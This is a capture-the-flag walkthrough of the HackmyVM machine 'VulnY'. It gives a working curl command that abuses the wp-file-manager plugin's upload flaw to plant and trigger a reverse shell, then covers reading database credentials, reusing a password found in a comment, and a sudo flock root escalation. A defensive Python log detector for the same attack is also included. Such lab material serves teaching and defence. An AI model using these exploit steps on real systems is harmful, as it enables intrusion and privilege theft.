HackmyVM-VulnY

Information gathering


┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.165 08:00:27:6c:16:9b PCS Systemtechnik GmbH
192.168.31.187 a6:9b:e0:2d:30:9a (Unknown: locally administered)
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 4 responded

The target IP is 192.168.31.165; scan its ports with nmap:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.165 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 00:19 EST
Nmap scan report for vulny (192.168.31.165)
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
33060/tcp open mysqlx
MAC Address: 08:00:27:6C:16:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 28.56 seconds

A MySQL service and an HTTP service are open.

Port 80

A directory scan turns up a directory named secret:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl http://192.168.31.165/secret/
Neither <b>/etc/wordpress/config-192.168.31.165.php</b> nor <b>/etc/wordpress/config-168.31.165.php</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username

The error message points at /etc/wordpress/config-168.31.165.php, so this is a WordPress install, and wp-content has directory listing enabled.

Under Index of /secret/wp-content/uploads/2020/10 there is an archive wp-file-manager-6.O.zip; this plugin has an arbitrary file upload vulnerability.

curl -F cmd=upload -F target=l1_ -F upload[]=@rev.php -XPOST "http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

This uploads a reverse shell file.

Then request http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/files/rev.php

to trigger the reverse shell:

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
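
From the defender's side, the upload-then-execute sequence above leaves a clear trace in the web server access log: a POST to the plugin's elFinder connector followed by a request for a .php file under lib/files/ from the same client. The following is an added example (not part of the original write-up); the log lines are constructed to mirror the sequence, and the Apache combined format is assumed.

```python
import re
from typing import Dict, List

# Constructed sample lines in Apache combined log format (not from the original
# write-up); they mirror the upload-then-execute sequence shown above, plus one
# unrelated request that should not be flagged.
SAMPLE_LOG = """\
192.168.31.129 - - [24/Jan/2025:00:25:01 -0500] "GET /secret/wp-content/uploads/2020/10/ HTTP/1.1" 200 812 "-" "curl/8.5.0"
192.168.31.129 - - [24/Jan/2025:00:25:10 -0500] "POST /secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 143 "-" "curl/8.5.0"
192.168.31.129 - - [24/Jan/2025:00:25:15 -0500] "GET /secret/wp-content/plugins/wp-file-manager/lib/files/rev.php HTTP/1.1" 200 0 "-" "curl/8.5.0"
192.168.31.50 - - [24/Jan/2025:00:30:00 -0500] "GET /secret/wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths belonging to the wp-file-manager plugin abused in the write-up.
CONNECTOR = "/wp-file-manager/lib/php/connector.minimal.php"
FILES_DIR = "/wp-file-manager/lib/files/"


def find_file_manager_abuse(log_text: str) -> List[Dict[str, str]]:
    """Return one alert per suspicious request: a POST to the elFinder
    connector is medium on its own; a later request for a .php file under
    lib/files/ from the same client is high (the upload being executed)."""
    posted_from: Dict[str, str] = {}  # client ip -> timestamp of connector POST
    alerts: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        ip, ts, method, path = m["ip"], m["ts"], m["method"], m["path"]
        if method == "POST" and path.endswith(CONNECTOR):
            posted_from[ip] = ts
            alerts.append({"ip": ip, "ts": ts, "severity": "medium",
                           "reason": "POST to wp-file-manager connector"})
        elif FILES_DIR in path and path.split("?")[0].lower().endswith(".php"):
            severity = "high" if ip in posted_from else "medium"
            alerts.append({"ip": ip, "ts": ts, "severity": severity,
                           "reason": f"PHP file requested from plugin upload dir: {path}"})
    return alerts


if __name__ == "__main__":
    for a in find_file_manager_abuse(SAMPLE_LOG):
        print(a["severity"].upper(), a["ip"], a["ts"], a["reason"])
```

A hardened deployment would also remove or update the plugin and deny execution of PHP under wp-content/plugins/*/lib/files/, so the second request fails regardless of the upload.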

Privilege escalation

cd into /etc/wordpress:

www-data@vulny:/etc/wordpress$ ls
ls
config-192.168.1.122.php htaccess

The filename differs from the one shown on port 80; presumably the port 80 page derives the filename from the requesting IP address.

www-data@vulny:/etc/wordpress$ cat c*
cat c*
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'myfuckingpassword');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>

This gives the MySQL credentials and the WordPress path. Looking at wp-config.php, one comment stands out:

/* idrinksomewater */

Logging into MySQL turns up nothing useful.

/etc/passwd shows a user adrian who can log in; the comment is the password:

www-data@vulny:/usr/share/wordpress$ su adrian
su adrian
Password: idrinksomewater

adrian@vulny:/usr/share/wordpress$

adrian@vulny:/$ sudo -l
sudo -l
Matching Defaults entries for adrian on vulny:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
(ALL : ALL) NOPASSWD: /usr/bin/flock

adrian@vulny:/$ sudo -u root /usr/bin/flock -u / /bin/bash
sudo -u root /usr/bin/flock -u / /bin/bash
root@vulny:/

Privilege escalation succeeded.